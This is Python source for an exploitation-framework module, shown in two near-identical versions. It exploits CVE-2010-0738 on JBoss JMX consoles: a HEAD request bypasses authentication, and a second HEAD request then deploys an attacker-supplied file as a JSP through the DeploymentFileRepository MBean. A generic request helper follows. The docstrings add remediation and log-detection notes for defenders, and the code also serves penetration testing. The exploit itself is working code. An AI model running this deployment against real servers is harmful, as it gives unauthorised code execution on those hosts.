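def run(fingerengine, fingerprint):
    """Check a JBoss JMX console for CVE-2010-0738 and deploy through it.

    CVE-2010-0738 is an authentication bypass: requests sent with a
    different HTTP verb, such as HEAD, are not challenged. A 200 answer to
    a HEAD request on the HtmlAdaptor is treated as "vulnerable"; the file
    named by ``fingerengine.options.deploy`` is then sent in a second HEAD
    request that invokes the DeploymentFileRepository MBean.

    Defender notes:
      * Remediation is on the server side: the console's security
        constraint has to cover every HTTP method rather than a listed
        subset of ``<http-method>`` entries, and the console should not be
        reachable from untrusted networks.
      * Both requests leave a recognisable trace in access logs: HEAD
        requests to /jmx-console/HtmlAdaptor, the second one carrying
        ``action=invokeOp`` in the query string.

    Args:
        fingerengine: engine object; ``options.ip`` and ``options.deploy``
            are read here.
        fingerprint: fingerprint of the matched service; ``port`` is read.

    Returns:
        None. Results are reported through ``utility.Msg``.
    """
    utility.Msg("Checking %s for verb tampering" % fingerengine.options.ip,
                LOG.DEBUG)

    # The scheme is hard-coded: this module only talks plain HTTP.
    url = "http://{0}:{1}/jmx-console/HtmlAdaptor".format(
        fingerengine.options.ip, fingerprint.port)

    response = utility.requests_head(url)
    if response.status_code == 200:
        utility.Msg("Vulnerable to verb tampering, attempting to deploy...",
                    LOG.SUCCESS)

        war_file = abspath(fingerengine.options.deploy)
        war_name = parse_war_path(war_file)

        # Read through a context manager so the handle is closed
        # deterministically instead of being left to the garbage collector.
        with open(war_file) as handle:
            payload = handle.read()

        tamper = ("/jmx-console/HtmlAdaptor?action=invokeOp"
                  "&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"
                  "&arg0={0}&arg1={1}&arg2=.jsp&arg3={2}&arg4=True").format(
                      war_file.replace('.jsp', '.war'), war_name,
                      quote_plus(payload))

        response = utility.requests_head(url + tamper)
        if response.status_code == 200:
            utility.Msg("Successfully deployed {0}".format(war_file),
                        LOG.SUCCESS)
        else:
            utility.Msg("Failed to deploy (HTTP %d)" % response.status_code,
                        LOG.ERROR)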
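def run(fingerengine, fingerprint):
    """Probe for CVE-2010-0738 (HTTP verb tampering) and attempt a deploy.

    This module exploits CVE-2010-0738, which bypasses authentication by
    submitting requests with different HTTP verbs, such as HEAD. The probe
    is a HEAD request to the JMX console's HtmlAdaptor; only a 200 answer
    leads to the second HEAD request, which carries the file named by
    ``fingerengine.options.deploy`` to the DeploymentFileRepository MBean.

    For defenders: the finding means the console's access control does not
    cover all HTTP methods. The fix is a security constraint that applies
    to every verb, plus network restrictions on the console. HEAD requests
    to /jmx-console/HtmlAdaptor with ``action=invokeOp`` in the query
    string are the log artefact to look for.

    Args:
        fingerengine: supplies ``options.ip`` and ``options.deploy``.
        fingerprint: supplies ``port`` of the fingerprinted service.

    Returns:
        None; every outcome is logged via ``utility.Msg``.
    """
    target = fingerengine.options.ip
    utility.Msg("Checking %s for verb tampering" % target, LOG.DEBUG)

    # Plain HTTP only: the scheme is fixed in this format string.
    url = "http://{0}:{1}/jmx-console/HtmlAdaptor".format(target,
                                                          fingerprint.port)

    probe = utility.requests_head(url)
    if probe.status_code != 200:
        # Anything other than 200 is treated as "not affected" and ends
        # the module without a message, as before.
        return

    utility.Msg("Vulnerable to verb tampering, attempting to deploy...",
                LOG.SUCCESS)

    war_file = abspath(fingerengine.options.deploy)
    war_name = parse_war_path(war_file)

    # Close the file explicitly; the original left the handle open.
    with open(war_file) as war_handle:
        contents = war_handle.read()

    tamper = ("/jmx-console/HtmlAdaptor?action=invokeOp"
              "&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"
              "&arg0={0}&arg1={1}&arg2=.jsp&arg3={2}&arg4=True").format(
                  war_file.replace('.jsp', '.war'), war_name,
                  quote_plus(contents))

    result = utility.requests_head(url + tamper)
    if result.status_code == 200:
        utility.Msg("Successfully deployed {0}".format(war_file), LOG.SUCCESS)
    else:
        utility.Msg("Failed to deploy (HTTP %d)" % result.status_code,
                    LOG.ERROR)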
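def make_request(method, host, port, ssl, url, data, cookies=None,
                 allow_redirects=True):
    """Send a single request through the ``utility.requests_*`` helpers.

    Args:
        method: 'GET', 'BASIC', 'POST', 'HEAD' or 'PUT'; any other value is
            passed on to ``utility.requests_other`` as the verb.
        host: target host name or address.
        port: target port; ``None`` selects 443 when ``ssl`` is true and 80
            otherwise.
        ssl: truthy for an ``https`` URL, falsy for ``http``.
        url: path (and query) appended after ``host:port``.
        data: request body for POST and PUT. For 'BASIC' it is indexed with
            'username' and 'password' to build the auth tuple.
        cookies: forwarded to the helper unchanged.
        allow_redirects: forwarded for POST only; the other verbs do not
            receive it.

    Returns:
        Whatever the helper returns, or ``None`` after a timeout or a
        connection error (both are logged at 'DEBUG'). Other exceptions
        propagate to the caller.

    Security notes:
        * 'BASIC' with a falsy ``ssl`` sends the credentials to an
          ``http://`` URL, i.e. without transport encryption.
        * NOTE(review): whether TLS certificates are verified is decided
          inside the ``utility.requests_*`` helpers, which are not visible
          here - confirm before relying on ``ssl=True`` for authenticity.
    """
    if port is None:
        port = 443 if ssl else 80

    try:
        url = "{0}://{1}:{2}{3}".format("https" if ssl else "http",
                                        host, port, url)

        if method == 'GET':
            response = utility.requests_get(url, cookies=cookies)
        elif method == 'BASIC':
            response = utility.requests_get(
                url, cookies=cookies,
                auth=(data['username'], data['password']))
        elif method == 'POST':
            response = utility.requests_post(
                url, data, cookies=cookies, allow_redirects=allow_redirects)
        elif method == 'HEAD':
            response = utility.requests_head(url, cookies=cookies)
        elif method == 'PUT':
            response = utility.requests_put(url, data, cookies=cookies)
        else:
            response = utility.requests_other(method, url, cookies=cookies)

        return response
    except exceptions.Timeout:
        utility.Msg("Timeout to {0}:{1}".format(host, port), 'DEBUG')
    except exceptions.ConnectionError as e:
        # The original format string had two placeholders for three
        # arguments, so the exception text was silently dropped and the
        # port was printed in its place.
        utility.Msg("Connection error to {0}:{1} ({2})".format(host, port, e),
                    'DEBUG')

    return None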
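def make_request(method, host, port, ssl, url, data, cookies=None,
                 allow_redirects=True):
    """Build the target URL and dispatch one request by ``method``.

    The URL is ``<scheme>://<host>:<port><url>`` where the scheme is
    ``https`` for a truthy ``ssl`` and ``http`` otherwise. A ``port`` of
    ``None`` defaults to 443 or 80 to match the scheme.

    Dispatch:
        'GET'   -> ``utility.requests_get``
        'BASIC' -> ``utility.requests_get`` with
                   ``auth=(data['username'], data['password'])``
        'POST'  -> ``utility.requests_post`` with ``data`` and
                   ``allow_redirects``
        'HEAD'  -> ``utility.requests_head``
        'PUT'   -> ``utility.requests_put`` with ``data``
        other   -> ``utility.requests_other`` with ``method`` as the verb

    Returns:
        The helper's response, or ``None`` when the request timed out or
        the connection failed; both cases are logged at 'DEBUG' and not
        re-raised. Any other exception propagates.

    Security notes:
        * With a falsy ``ssl`` the 'BASIC' credentials go to a plain
          ``http://`` URL.
        * NOTE(review): certificate verification is up to the
          ``utility.requests_*`` helpers, not shown here - confirm.
    """
    response = None

    # Pick the scheme's conventional port only when the caller gave none.
    if port is None:
        port = 443 if ssl else 80

    scheme = "https" if ssl else "http"
    try:
        url = "{0}://{1}:{2}{3}".format(scheme, host, port, url)

        if method == 'GET':
            response = utility.requests_get(url, cookies=cookies)
        elif method == 'BASIC':
            credentials = (data['username'], data['password'])
            response = utility.requests_get(url, cookies=cookies,
                                            auth=credentials)
        elif method == 'POST':
            response = utility.requests_post(url, data, cookies=cookies,
                                             allow_redirects=allow_redirects)
        elif method == 'HEAD':
            response = utility.requests_head(url, cookies=cookies)
        elif method == 'PUT':
            response = utility.requests_put(url, data, cookies=cookies)
        else:
            response = utility.requests_other(method, url, cookies=cookies)

        return response
    except exceptions.Timeout:
        utility.Msg("Timeout to {0}:{1}".format(host, port), 'DEBUG')
    except exceptions.ConnectionError as e:
        # Three arguments now have three placeholders; before, the error
        # text never reached the log and the port appeared in parentheses.
        utility.Msg("Connection error to {0}:{1} ({2})".format(host, port, e),
                    'DEBUG')

    return None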